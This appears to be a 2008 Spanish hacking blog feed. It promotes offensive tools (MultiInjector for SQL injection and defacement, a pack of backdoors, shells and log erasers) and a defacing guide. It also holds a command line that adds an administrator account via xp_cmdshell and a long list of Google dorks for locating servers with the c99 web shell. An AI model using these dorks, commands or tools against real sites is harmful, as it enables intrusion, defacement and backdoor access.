Burp Suite es una plataforma integrada para atacar aplicaciones Web. Contiene todas las herramientas De Burp con numerosas interfaces entre ellas destinadas a facilitar y acelerar el proceso de atacar a una solicitud. Todas las herramientas comparten el mismo marco sólido para el manejo de solicitudes HTTP, la persistencia, la autenticación, los servidores proxy, la tala, la alerta y la extensibilidad.

Burp Suite le permite combinar técnicas manuales y automáticas para enumerar, analizar, explorar, atacar y explotar aplicaciones Web. Burp Suite te permite verificar las diversas herramientas de trabajar juntos de manera efectiva para compartir información y permitir conclusiones identificadas en una herramienta para formar la base de un ataque con otro (Las herramientas son proxy, Spider, escáner, intrusión, repetidor, Secuenciador, decodificador y Comparer).

Las principales características exclusivas de Burp Suite incluyen:

análisis detallado y la prestación de solicitudes y respuestas.
Transferencia de un solo clic de solicitudes interesantes entre herramientas.
Capacidad de "pasivamente" auditar una solicitud en forma no intrusiva, con todas las solicitudes emanadas desde el navegador del usuario.
Compatible con FIPS-análisis estadístico de la sesión simbólica aleatoriedad.
Utilidades para la decodificación y la comparación de datos de aplicación.
Apoyo personalizado para el cliente y el servidor de certificados SSL.
Extensibilidad a través de la interfaz IBurpExtender.
Centralizada para configurar los ajustes de proxy, web y proxy de autenticación, y la explotación forestal.
Las Herramientas se pueden ejecutar en una única ventana con pestañas, o ser separado en cada uno de las ventanas.
Se ejecuta en Linux asi como en Windows :S .

Nuevas características en la versión 1.2 incluyen:

Mapa del sitio muestra la información acumulada sobre las solicitudes de destino en forma de árbol y en el cuadro.
Web Vulnerability Scanner. [Sólo versión Pro]
Suite nivel objetivo alcance configuración, herramienta de conducción numerosas acciones.
Muestra filtros de mapa de la web y Proxy petición historia.
Capacidad de guardar y restaurar estado. [Sólo versión Pro]
Suite en toda la función de búsqueda.
Soporte para proxy invisible.

Burp Suite es una aplicación Java, y funciona en cualquier plataforma para que un entorno de ejecución Java que este disponible. Requiere la versión 1.5 o posterior. El JRE se puede obtener gratuitamente desde

java.sun.com.

Descarga Burp Suite desde Aqui

Lee Aka --> (O)

MultiInjector v0.3 Liberada- SQL Injection y Herramienta de Defacement Automatica

noreply@blogger.com (r3b1rth X) — Sat, 03 Jan 2009 18:15:24 PST

La Mejor Herramienta para los script kiddies xD......

Características

Recibe una lista de URL como entrada
Reconoce los parámetros URL de la lista
Realiza Fuzzing a todos los parámetros de URL para concatenar los carga útil una vez que la inyección se realiza correctament
Ejecuta comandos - a distancia que permite Ejecutar una xp_cmdshell en el servidor SQL, posteriormente, ejecutar comandos en cualquier sistema operativo arbitrarias líneas de comandos introducidos por el usuario.
Configurable a conexiones paralelas exponencialmente acelera el proceso de ataque - una carga útil, múltiples objetivos, ataques simultáneos
Uso opcional de un proxy HTTP para ocultar el origen de los ataques

Cambios

Trata de concatenar una cadena a todos los definidos por el usuario en los campos del texto del PP (defaceo automatico)
ejecuta cualquier comando como si estas usando una consola de comandos en la máquina (Victima)
Ejecutar comandos SQL de su elección
Activa el procedimiento de shell OS PP - Revive los viejos xp_cmdshell en el que se apaga
Añade usuario administrativo (maquina victima) al servidor con contraseña: T0pSeKret
Habilitar escritorio remoto en el servidor (victima)
Añadido / tipo de parámetro de cadena de detección (numerico)
Se Mejor la manipulación por desfiguración contenido escapar comillas
Soporte mejorado para sistemas Linux
Fija el "número inválido de conexiones simultáneas" fracasado debido a la falta de parámetros URL

Puede descargar aquí MultiInjector v0.3..

ClubHacker

noreply@blogger.com (r3b1rth X) — Wed, 31 Dec 2008 14:30:35 PST

El Proyecto De Clubhacker sigue en pie.,a raiz de preguntas de colegas sobre si el proyecto habia desaparecido pero no...aun esta...

Queremos crear algo diferente y que los usuarios sean parte de el creando proyectos propios y de autoria de los usuarios,es la manera de crear y imnovar..

la informatica es una pasion todos tenemos proyectos encima de los cuales mas de la mitad no concretamos pero si hacemos un equipo se puede lograr y marcar la diferencia...

El Internet es la herramienta de conocimiento mas poderosa del mundo asi como el conocimiento es poder,queremos exortar a los usuarios que se unan a clubhacker y seamos artifices de investigar,ejecutar y crear proyectos interesantes de modo que compartamos el conocimiento a medida que aprendemos...

Y eso es lo que queremos hacer clubhacker fue creado hace poco un ano Por el-mago y desde si es un usuario que a traido calidad y nivel en su trabajo..
su web habla de su perfil y queremos que sean parte de esto

Entren Aqui

Pd: Perdonen la poca actividad que e tenido pero estoy en vacaciones de navidad :)

Seminario De Penetration Testing

noreply@blogger.com (r3b1rth X) — Wed, 17 Dec 2008 12:09:42 PST

Bueno para los que vivan por el area de caguas les invito el proximo 21 de diciembre al siguiente seminario para que consigan sus certificaciones a nivel etico xD....

no es tan dificil tampoco llegar a los que viven en el area metro:

mas detalles:

Seminario de Penetration Testing!

¿Sabes cual es la mejor forma de conseguir trabajo en una empresa como analista de seguridad?... Hackiandola!.

Seminario de Penetration Testing:
Este seminario está diseñado para que usted pueda aprender los conceptos y técnicas más comunes utilizada por los hackers, pero con el único propósito de usted pueda aprender a ofrecer los servicios de analista de seguridad y ayude a las empresas a mejorar su seguridad. Todas las empresas en el mundo pueden ser Hackiadas, TODAS!!. Ahora usted podrá saber como detectar los fallos de seguridad y trabajar para mejorarlos. Aprenderá a como hacer un penetration testing y como se mueve el mundo de los negocios de los Ethical Hackers en el mundo!. Ser un Hacker te puede llevar a la carcel, pero si sabes como sacarle dinero, te puede hacer rico.

En este seminario usted aprenderá:

1. Ethical Hacking.
En esta parte el participantes aprenderá como funciona la mente de los hackers y los atacantes de networks. El participante podrá saber cuales son las estrategias y tácticas principales usadas por los hackers.

2. Leyes y Procesos legales del Gobierno de Estados Unidos.
En esta parte usted conocerá cuales son las leyes que castigan a los hackers, sus penalidades y multas. Usted como analista de seguridad debe conocer cuales son las leyes y recursos legales para proteger su empresa o a su cliente.

3. Penetration Testing - Parte 1.
En esta parte el Instructor explicará todos los detalles básicos sobre el Penetration Testing. Usted podrá entender los conceptos principales de las pruebas de seguridad y porqué se deberían hacer.

4. Aprenderá a como crear un plan de "Penetration Testing"
En esta parte usted podrá aprender como crear un plan de penetration testing lógico para intentar hackiar una empresa y hacer las pruebas de seguridad.

5. Ejecutando un "Penetration Testing"
En esta parte usted podrá aprender como se ejecuta un plan de "Penetration Testing", con el fin de saber donde se encuentra la falla y como un hacker entra un sistema.

6. Desarrollando Plan de Ingenieria Social.
En esta parte usted podrá aprender como un hacker desarrolla un plan de ingeniería social y como lo ejecuta para poder hackiar una empresa.

7. Desarrollo de Reconocimiento de una víctima.
En esta parte usted podrá aprender como un hacker desarrolla un plan de investigación para poder entrar a una empresa o conseguir una persona. Antes de que un hacker empiece cualquier tipo de ataque debe conocer a quien se va a enfrentar.

8. Rompiendo Password "Password Cracking".
En esta parte usted podrá aprender como los hackers rompe los password más comunes de los sistemas.

9. Escaneo y Penetración de Sistemas de Redes Wireless.
En esta parte el participante podrá aprender como los Hackers Escanea una Red Wireless y que herramientas utilizan para penetrar un sistema de redes.

10. Manejo de Trojanos y Virus.
En esta parte usted podrá aprender como los hackers crean los virus y manejan los trojanos para infectar sistemas y entrar a los mismos.

11. Ataques DoS "Denial Of Services"
En esta parte usted podrá aprender como los hackers desarrollan un ataque DoS para que los servidores colapsen mediante este tipo de ataque.

12. Caso de Estudio Penetration Testing .
En esta parte usted podrá analizar un caso de estudio sobre un cliente que el Instructor especificará, en donde el instructor presentará en el mundo real como se harían estos tipos de negocios.

13. Aprenderá a como Generar Dinero en el mundo de la Seguridad / Hacking.
En esta parte usted podrá aprender como ganar dinero legalmente ofreciendo sus servicios de penetration testing y Ethical Hacker.

14. Contrato Legal.
En esta parte se le entregará un contrato legal que usted podrá utilizar para ofrecer sus servicios de Penetration Testing.

15. Incluye Libro de Penetration Testing.
A todos los participantes del Seminario se le entregará un libro de Penetration Testing, creado por el Autor del Libro "El Arte del Hacking", Juan Carlos Rodríguez.

Dirigido a:
1. A todas las personas que deseen aprender sobre el mundo de la Seguridad.
2. A todas las personas que deseen convertirse en Hackers Eticos.
3. A todas las personas que se estén preparando para certificaciones de redes y Ethical Hacking.

[ Bono ]

1. Se entregará la lista de precios que usted puede cobrar por sus horas de servicio.

2. Se entregará un contrato de servicios que usted podrá utilizar para formalizar sus servicios de Penetration Testing, con sus clientes.

3. Se le explicará a usted como hacer negocios en el mundo de la seguridad

Fecha, horarios y Costos

Fecha: Domingo 21 de Diciembre de 2008
Horario: 8:30 am a 4:30 pm *Puede extenderse.
Lugar: NETYK Center.
Costo: $95.00 (Separas con: $50.00)

El seminario incluye:
1. El Seminario incluye Certificado Premium.
2. Libro de Texto que Explica Paso a Paso los temas del seminario.
3. CD con los Software para practicar en su hogar.
4. Incluye una Merienda durante el Seminario.

Requisito:
Querer Aprender.

Contacto con las oficinas de NETYK Center
787-704-2277
Horario: 10:00 am - 4:30 pm

Para separar su espacio por Internet entre al siguiente enlace:
https://www.netyk.com/index.php?option=com_rsform&formId=9&Itemid=99999

10 aspectos en los que Linux saca ventaja a Mac OS X

noreply@blogger.com (r3b1rth X) — Wed, 17 Dec 2008 08:47:09 PST

Lei Un Articulo Que Me Parecio Interesante En El Blog Webnoticiero y lo cito a continuacion:

"Siempre estamos hablando de Linux frente a Windows debido a que es el sistema operativo mayoritario, al menos por esta parte del mundo, pero no sólo se puede comparar frente al niño de la empresa de Bill Gates. Mac OS X es un sistema operativo muy cuidado estéticamente y muy sencillo de utilizar, pero, todo en la vida tiene “peros”, Linux se desenvuelve mejor que Mac OS X en 10 aspectos."

La primera de ellas es la flexibilidad. Con ello no queremos decir que OS X no sea un sistema operativo sencillo y configurable por el usuario. Sino más bien que OS X es más en el sentido Windows que Linux, es decir que tienes una opciones estipuladas y de ahí no te salgas, porque no hay más. Pongamos un ejemplo para ilustrar, en OS X puedes mover el Dock de sitio, hacerlo más grande, más pequeño, hasta hacer que se esconda de forma automática, incluso hay temas para el mismo. Pero de ahí no se puede pasar. Si por ejemplo quieres cambiar la barra de herramientas superior, es imposible. Con Linux puedes disponer del gestor de ventana que quieras y hay un nivel de personalización prácticamente inacabable.

El siguiente aspecto a tener en cuenta es el código abierto. Uno de los grandes problemas para los usuarios de Linux es lo restrictivo de la licencia de OS X. Apple hizo uso de un kernel BSD para crear el kernel Darwin, que fue lanzado bajo licencia Apple Public Source License, aceptada por la FSS (Free Software Foundation), y posteriormente se unió todo el software propietario para crear OS X.

El tercer puesto ha sido otorgado a la línea de comandos. Aunque muchos usuarios de OS X afirman que no hay necesidad alguna de usarla, muchos usuarios avanzados saben que la línea de comandos es crucial para importantes tareas administrativas. En este aspecto OS X fall en comparación con Linux, dado que prácticamente puede hacerse todo desde una consola de comandos de Linux. Con OS X disponen de varios comandos pero no es tan completa como la línea de comandos Linux.

El siguiente punto es los requisitos de hardware, siendo de lejos Mac OS X mucho más exigente que Linux. Con ello no estamos comparando con la omnipresente Ubuntu, hay distribuciones de Linux mucho más ligeras que afirman funcionar sobre cualquier procesador y 256 megas de RAM. Pero comparando directamente los requisitos de Ubuntu con OS X:
OS X: 876 MHz , 512 MB de RAM, 9 GB HDD
Ubuntu: 700 MHz x86 , 384 MB de RAM, y 8 GB HDD

La seguridad es otro punto a tener en cuenta y aquí tan sólo os podemos remitir al resultado de la competición “Pwn 2 Own”.

El siguiente aspecto a tratar es la portabilidad, y con esto hablamos de la capacidad de migrar una propia instalación de una configuración de hardware a otra. Linux dispone de una gran adaptabilidad que le permite relocalizar y organizar el sistema al nuevo hardware. Con OS X estamos hablando de una instalación de 0.

El caballero D. Dinero es el siguiente punto. El coste de OS X frente a Linux(0 €). Partiendo de que para disponer de OS X (legalmente) tienes que disponer de una máquina Apple, no sólo lo comparamos con los 129 $ que cuesta el sistema. El portátil más barato MacBook que se puede adquirir son 999 dólares. Se puede adquirir un portátil por menos de 400 euros y correr Linux perfectamente.

Software disponible. Aunque a mucho les suene a sorpresa, hay mucho más software disponible para Linux que para OS X, tan sólo hya que realizar una búqueda en Google con OS X Software y Linux Software, los resultados son 19 millones y 45,7 millones aproximadamente. Además de ello es que en Linux hay una característica que le diferencia del resto de sistemas, hay muchas utilidades disponibles para realizar una tarea. Es decir, por ejemplo en Mac, tienes disponible Microsoft Office y OpenOffice como opciones mayoritarias, luego entramos en la categoría de menor nivel con Bean, Nisus, Mellel y NeoOffice. En Linux tenemos OpenOffice, y luego: Textmaker, Abiword, Hangul, EZ, Kwrite, gedit, nano, vi, emacs, Flwriter, Ted, Siag Office, LaTeX, EditPad Pro, y un largo etcétera. Además, es posible instalar aplicaciones de Linux en OS X gracias a Fink.

El penúltimo aspecto en el que Linux es superior a OS X es que Mac OS X siempre muestra la misma apariencia y manejabilidad, da igual que seas un usuario novel, que uno avanzado. Y cuando llevas un tiempo con el sistema se nota. El sistema está realizado con la simplicidad en mente, y no siempre es bueno. En Linux puedes elegir entorno gráfico, gestor de ventanas o simplemente una consola de texto, así como cualquier mezcla de las opciones anteriores, lo que te da flexibilidad para el uso que necesites dar al ordenador en ese momento.

Y el último punto es la eficiencia del teclado. Si vienes de un sistema Windows o Linux nada más entrar en contacto con un teclado Mac te das cuenta de que hay cosas que no funcionan como deberían. Ejemplos, la tecla Delete no funciona como es debido, para hacerla funcionar tienes que pulsar fn + Delete. Lo mismo pasa con la tecla Fin, para que funcione: Fn + Fin. Las combinaciones de teclas también son bastante extrañas en ocasiones, aunque al fin y al cabo cada sistema tiene las suyas. Otro problema es el ratón y sus botones. Sé que es fundamental en el diseño de Apple pero la mayoría de gente hace uso de los dos botones del ratón. Además en Linux puedes hacer uso de los 3 botones del ratón de serie. En mi caso particular tengo un ratón con 5 botones y dispongo de plena funcionalidad, incluyendo un copiar y pegar.

Éstas son 10 puntos en los que Linux es superior a OS X. Serán más o menos rebatibles/discutibles, pero está claro que no son los únicos.

Defacing De La Manera Correcta Desde 0 (Recopilacion)

noreply@blogger.com (r3b1rth X) — Wed, 10 Dec 2008 17:05:46 PST

E visto que en muchos foros preguntan:

quiero aprender a defecear por donde comienzo?
a lo que usualmente le contestan
aprende a usar SSS o acunetix,escanea la pagina,y busca su respectivo exploit en milw0rm y explotala,busca dorks en www.google.com etc etc

pero realmente no se han detenido a pensar que realmente no aprenderia el usuario nada.ni siquiera de que y de donde viene una vulnerabilidad en una aplicacion web.

y tampoco los encaminan a que aprendan programacion por que la mayoria de las veces las vulnerabilidades provienen o del administrador del server o del administrador de la web o del script web que este utilizando.

o sea que en resumidas cuentas a la hora de que el usuario empiece a usar sus scanners y explotar con sus exploits de milw0rm no tiene la menor idea de por que vino la falla.

"pero diran pero si yo quiero solamente es defecear la pagina"
si es asi continua usando los scanners y explotando scripts prefabricados que salen vulnerables en milw0rm y no sigas leyendo.

Aqui tambien encontraras todas las herramientas renombradas con sus respectivos enlaces de descarga que estan marcado de este color asi que pueden visitar los enlaces ;)

Por Que Este Paso A Paso?
Ya eso lo conteste arriba creo :)
Cual Es El Objetivo
El Objetivo es que los usuarios,clarifiquen su camino y no se pierdan en lo que es el defacing,y que muestren interes en una rama del hacking interesante como lo es la Busqueda de vulnerabilidades a nivel web
Que Aprendere?
Lo mejor del under,que uno aprende hasta que tu mismo quieras si eres autodidacta y sabes dividir tu tiempo aprenderas todo

A continuacion ire recopilando lo que si debes ocupar si quieres realmente convertirte en un "defacer" (si asi se le llama) xD
Por Donde Empiezo
ok por donde empieza la creacion de todo en el internet Programacion
el internet se mueve gracias a cientos de lenguajes de programacion y por ahi debes comenzar:
1-Html Al Menos Basico
@html es un lenguaje de programacion por el cual estan programadas muchas paginas webs y seguramente sea el que quieras usar para poner tus index en tu camino hacia zone-h xD
Html Info Wikipedia
Tuto Html by LogMare
HTML Y CSS
******************
2-PHP Intermedio
@PhP Es Un lenguaje a nivel web similar al Html pero este tiene la ventaja que hace nuestros sitios dinamicos y realmente se pueden hacer cosas maravillosas con el...
PhP info Wikipedia
Manuales PhP
Recopilacion De PhP
Manual en linea PhP
******************
3-Sql
@Bueno esto es un lenguaje que esta de una forma ligado a la programacion web y al defacing por que es un lenguaje del que se ocupa de gestionar base de datos de sitios webs y deferentes estructuras.
SqL Wikipedia Info
Diversos Libros y Manuales Sobre SQL
*******************
4-Perl
@Perl es un lenguaje por excelencia limpio,organizado,y potente..por el cual es imprcindible ya que su potencia abarca en lo que respecta a la programacion de exploits crear tus propias tools e inclusive automatizar tus maldades
Perl Wikipedia Info]
[+Recopilacion De Tutos De Perl
#####################
Bueno por ahora nos quedamos en esos lenguajes no es obligatorio pero es imprecindible a la hora que quieras avanzar y quieras solo descubrir fallos en sistemas u otras cosas (Pentester)
Que Tecnicas Usare En el defacing?
1-SqlInjection
Sql Injection Wikipedia Info
Error based SQL Injection by AnalyseR (ingles)
Blind MySQL Injection by ka0x
Técnicas de inyección en MySQL by ka0x
MYSQL BLIND SQL INJECTION by Pepelux
***********************
2-LFI(Local File Inclusion)
Remote / Local File Inclusion Exploits by Sunjester(inggles
f**king the Web Apps LfI BY josS
***********************
3-XSS(Cross Site Cripting)
XSS Wikipedia Info
Cross Site Scripting [XSS] by sl4xUz
XSS (Cross Site Scripting)Evasion De Filtros
***********************
4-RFI (Remote File Include)
RfI Wikipedia Info]
RFI 101 Basico by blood_rec
R.F.I. Rooting (Linux Server and Safe Mod: OFF) by satanicstar (ingles)
************************

bueno eso son las tecnicas mas comunes por las cuales deberias empezar en esto del defacing....
Que Herramientas Ocupo?
@No Nesesitas Todas Estas Herramientas Que enlistare pero las Enlisto Para Que te hagas alguna idea de lo que podrias utilizar
1-Mucha Paciencia y Cafe
La Nesesitaras ya que esto no es entrar ver y defecear y ya..

2-Nikto Scanner de Vulnerabilidades(linux)
un scanner para la plataforma de linux con una buena base de datos de vulnerabilidades para aplicaciones webs

3-Zenmap Scanner de Puertos
siempre un scanner de puertos es imprecindible a la hora de ver los puertos que tiene abierto la victima y este es muy bueno ya que te indica los servicios que gestiona cada puerto ;)
4-NetCatHerramienta de Monitoreo de Red

5-SSS Scanner de Vulnerabilidades (Windows) ##pass:hackhell
Shadow Security Scanner es un completísimo y efectivo escáner de vulnerabilidades para la plataforma de Windows nativa, aunque también examina servidores de cualquier otra plataforma revelando brechas en Unix, Linux, FreeBSD, OpenBSD y Net BSD.

6-Acunetix Scanner De Vulnerabilidades (Windows) ##pass:just4you
Acunetix Web Vulnerability Scanner, una sencilla herramienta con la que podrás analizar todas las posibles entradas de hackers que pueden producirse en tu sitio web y así cerrarlas.

7-Cygwin (Compilador)
Informacion Aqui

8-Metasploit Framework de Hacking Completa
No muy nesesaria esta tool pero trae muy buenas herramientas mas info Aqui

no voy a seguir enumerando herramientas por que no terminaria y lo que queremos aqui es que vayan desde 0 hasta no se 1,000 xD

hay muchas tools que pueden ocupar como scripts en diferentes lenguajes,perl,C++,PhP,Ruby

por ejemplo:
LFI fUZZER (para buscar Lfi)
En fin si enumero no terminamos les ahorre el trabajo preparandole un Big Pack (Paquete Grande) El Cual Contiene todo lo que nesesitas,Herramientas,Manuales,Shells,Perl Scripts,Python Scripts,Backdoors,Sources...

De todo un gran pack por el cual querras darle una buena revisada...
reitero que algunas de las herramientas que estan en el paquete no fueron testeadas asi que no me hago responsable de horrores ni danos en su pc.

si enumero todo el contenido del paquete realmente este post se hace larguisimo si asi lo quieren preparo un texto y se los publico por aqui solo me dejan saber
/backdoors
/ManulesDefacing
//Mass Defacer And Log Eraser
/perltools
/phyton to0ls
/Reverse to0ls
/Ro0t 3xpl0its
/Scanners
/shells
/sources
/to0ls

Descargalo Aqui

###########################
Ya con esto tienen realmente por donde empezar y realmente no nesesitan usar todas las tools todo es por paso comienzen por la programacion luego pasan por partes a aprender las teknikas..

recuerden que no puedes aprender las tecnicas primero sin aprender programacion por que realmente no aprenderas comno funcionan las cosas..

la programacion fue lo que comenzo todo y asi mismo lo terminara escoje el camino que quieras recorrer y descubre el mundo de la busqueda de vulnerabilidades..

yo por mi parte no soy defacer no me gusta andar poniendo 1,000 index y decir soy el mas Pingon de la red...megusta buscar vulnerabilidades y notificarlas al administrador pero ya esta de ustedes escoger lo que quieren hacer con sus conocimientos

Esta recopilacion fue hecha con motivos educacionales ni este servidor ni el sitio donde a sido posteado se hace responsable de el uso que le den,asi como tambien los autores de los manuales que han sido recopilados...

espero que les sea de su agrado

EOC (END OF COURSE) xD

blood_rec

Spanish Hacker Team The Come Back!!! (Regresa)

noreply@blogger.com (r3b1rth X) — Sat, 22 Nov 2008 12:28:19 PST

Estamos felices de anunciar que Spanish Hacker Team a Regresado esta vez con nuevo dominio y nuevo formato..

http://hack0wn.com/

el sitio como lo era SHT Esta Orientado a la publicaciones de Advisories,Fuckers,Papers Shellcodes y todo lo demas que podiamos encontrar en el viejo dominio con su antiguo Formato Info..

Esta vez mi hermanito menor JosS A puesto un foro en el dominio para la publicacion de los respectivos servicios que brinda el foro:
Advisories
Remote Expoits
Local Exploits
Web Apps Exploits
Proof Of Concept
Post Your Research
Papers
Sources
Shellcodes
Infector
Defences
Post Your Writing
Misc
Fuckers
Post Your Miscellaneous
--------------------------------------------------------------
Asi como los servicio de la web:

###################################
se los pongo asi por que son en dos formatos diferentes las publicaciones en el Foro son las primeras que le liste y la Web Que fueron las segunda que le liste..

Este Proyecto Recalco como dije la primera vez hay que apoyarlo ya que es de nuestras comunidades latinas y un arduo trabajo que a puesto JosS A dispocicion de nosotros como proyecto de investigacion y del todo educacional xD...

Felicitaciones a nuestro colega y Brindemos Para Que siga adelante...

Greetz!!!!

Hackeando Hotmail y MSN De Manera Facil xD (Humor)

noreply@blogger.com (r3b1rth X) — Fri, 21 Nov 2008 20:15:08 PST

Bueno Cansado Ya De Los Chicos En Los Foros Preguntando :
Como Hackeo Hotmail?
Quiero Ver Con Quien Habla Mi Zorra..
Mi Mama Le Pega Los Cuernos A mi Papa Con Un Sargento Militar

Me tome la molestia en hacer un manual de como hackear hotmail y msn sin nesesidad de xploits,troyanos o cascanolaherramientas...

si asi como lo lees!!! How To Hack Hotmail And MSN Messenger Without xploits,trojans and cascanolato0ls

ok primero quiero recalcar que este manual fue hecho con licencia Creative mojons digo quiero decir CommonsAsi Que Ya saben toda la mierda de Publicaciones y cosas ETC,ETC,ETC....
Dejemosnos de mierdas y pongamonos manos a la obra...

Lo mejor de todo es que este manual esta orientado a cualquier sistema operativo:
Linux
Mac ox
Windows xp
Windows xD Virus Edition
Windows xD Blues Sceen Of Death Edition
Windows xD Trojan Always Edition
Windows xD Cascanola Edition
Open BSD
BSD
Windows Vista
en fin en cualquier sistema operativo empecemos ya!!!! xD:
Primero nuestras herramientas las listo con su respectivo link de descarga:
1-scanner de victimas para encontrar tus victimas:
Scanner
2-Nesesitamos buenos wordlist para nuestra herramienta de fuerza bruta
Aqui
3-Bueno Esta Herramienta Que Es La que vamos a usar (Fuerza Bruta)
Supermega h4xor juanker Hotmail tool
4-Si nesesitamos ayuda con una herramienta extra ocupamos esta:
Supermega h4x0r juanker Hotmail hot tool
5-una buena herramienta para borrar logs:
Logs Eraser

y eso es todo xDDDD Ya me mentan la madre pero no son dificiles de utilizar xD
#########################################

Para entender el manual deben ver las imagenes que enlazan o sea clickeando las imagenes :D

Primero ejecutamos nuestro Scanner De Victimas (yendo a la casa de la victima) y Agregamos nuestro Wordlist A La Herramienta de Fuerza Bruta ahora vamos y
ejecutamos nuetra herramienta de fuerza bruta (se la mostramos a la victima)
y comenzamos a crackear
luego de empezar a crackear si ven que la contrasena es muy dificl ocupen la otra herramienta de fuerza bruta y si aun asi el password de la victima no lo consiguen ejecuten la primera tool de esta manera Aqui ...
luego de conseguir el pass borren sus logs

de esta manera conseguiran hackear cualquier cuenta de hotmail,msn,yahoo,gmail cualquier correo hasta consiguen passwords de administradores de redes y webs....

xDDDDD moraleja de este texto...no me manden mas mails preguntandome como se juankea una cuenta de hotmail o de cualquier correo con todas esas excusas de que su padre es infiel,que su novia le robaron y todas esas mamadas

por que si no quedarian asi

espero a que no lo tomen a mal...por que no era lo que ustedes esperaban pero lamentablemente no JUANKEO Cuentas de hotmail...

xD

Maltego - Herramienta forense y de IT (Recolector de Info)

noreply@blogger.com (r3b1rth X) — Fri, 21 Nov 2008 18:57:17 PST

Una Excelente Aplicacion Para Encontrar Archivos Y directorios Ocultos En servidores Por Lo General La Recomiendo...

Maltego es una fuente abierta de inteligencia y aplicación forense. Te permite la minería y la recolección de información, así como la representación de esta información en una manera significativa.

Junto con sus bibliotecas de gráficos, Maltego, le permite identificar las relaciones clave entre la información y determinar las relaciones desconocidas anteriormente entre ellos. Es una herramienta Imprecindible en el Sector forense, la seguridad y la inteligencia de los campos!

Maltego ofrece al usuario la información sin precedentes. La información es de palanca.

Maltego ¿Qué hace?

Maltego es un programa que puede ser usado para determinar las relaciones del mundo real y los vínculos entre:

Gente
Grupos de personas (redes sociales)
Empresas
Organizaciones
Sitios web
Infraestructura de Internet, tales como: Dominios, nombres DNS, Netblocks y direcciones IP
Frases
Afiliaciones
Documentos y archivos

Estas entidades están vinculadas utilizando Scripts De Codigo Abierto.

Maltego es fácil y rápido de instalar - por que utiliza Java, por lo que se ejecuta en Windows, Mac y Linux.
Maltego le proporciona una interfaz gráfica que permite ver esas relaciones instantánea y precisa - lo que permite ver las conexiones ocultas.
El uso de la interfaz gráfica de usuario (GUI) se puede ver fácilmente las relaciones - incluso si son tres o cuatro grados de separación de distancia.
Maltego es único porque utiliza un potente y flexible marco que hace posible la personalización. Como tal, Maltego se pueden adaptar a su propio, y únicos requisitos.

Limitaciones

La Version Community Edition es limitada en las siguientes maneras:

15 segundos de NAG pantalla
Guardar y exportar se ha inhabilitado
Niveles limitados de zoom
Sólo puede ejecutarse una sola Auditoria por entidad en un momento
No se puede copiar y pegar texto de la vista detallada
Transformaciones limitadas a 75 por día

Aqui Encuentras Una Guia Sobre la To0l Click

Puedes Descargar Maltego Version Comunidad Aqui:
Maltego CE - Linux
Maltego CE - Windows

Lee Mas Aqui

Palabras Mas Bucadas En Google (Hacking)

noreply@blogger.com (r3b1rth X) — Thu, 20 Nov 2008 17:35:58 PST

Cuales son las palabras que mas buscan los chicos en google referentes al hacking?

las busquedas mas hechas:

como usar Metasploi
Metasploit Tuto
Manual de Metasploit
Sql Injection Scanner
Hackear Hotmail (Lamentablemente)
Hackear Msn
Subir Shell Vbulleting
sql Injection Scanner
cracker para desencriptar los hash de joomla
subir archivos con metodo sql injection
explotacion de un xss
xp_cmdshell 'net user hacker /add'
Deface
Manual Defacing
Defacers
##############################
Dorks:

Code:

safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
download c99.php
download c99.php
download c99.php
inurl:c99.php
inurl:c99.php
allinurl: c99.php
inurl:c99.php
allinurl: c99.php
inurl:"/c99.php"
allinurl: c99.php
inurl:c99.php
inurl:"c99.php" c99shell
 inurl:c99.php uid=0(root)
 c99shell powered by admin
 c99shell powered by admin
inurl:"/c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
inurl:"c99.php
inurl:"c99.php
allinurl: "c99.php"
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: "c99.php"
inurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php
inurl:"c99.php"
allinurl:c99.php
inurl:"/c99.php
inurl:c99.php?
inurl:/c99.php+uname
allinurl:"c99.php"
allinurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
allinurl:c99.php
allinurl:c99.php?
allinurl:c99.php?
allinurl:c99.php?
"inurl:c99..php"
allinurl:c99.php
 c99shell [file on secure ok ]?
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
 powered by Captain Crunch Security Team
allinurl:c99.php
"c99.php" filetype:php
allinurl:c99.php
inurl:c99.php
allinurl:.c99.php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.php
allinurl:c99.php
inurl:c99.php
allinurl: "c99.php"
allinurl:c99.php
allinurl:c99.php
c99shell
inurl:c99.php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:"c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:/c99.php
inurl:"c99.php"
inurl:c99.php
inurl:c99.php
c99.php download
 inurl:c99.php
inurl:"c99.php"
inurl:/c99.php
inurl:"c99.php?"
inurl:c99.php
inurl:c99.php
files/c99.php
c99shell filetype:php -echo
c99shell powered by admin
inurl:c99.php
inurl:c99.php
inurl:"c99.php"
inurl:c99.php uid=0(root)
allinurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
inurl:"/c99.php" intitle:"C99shell"
inurl:"/c99.php" intitle:"C99shell"
inurl:"/c99.php" intitle:"C99shell"
C99Shell v. 1.0 pre-release build #5
inurl:c99.php
inurl:c99.php
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
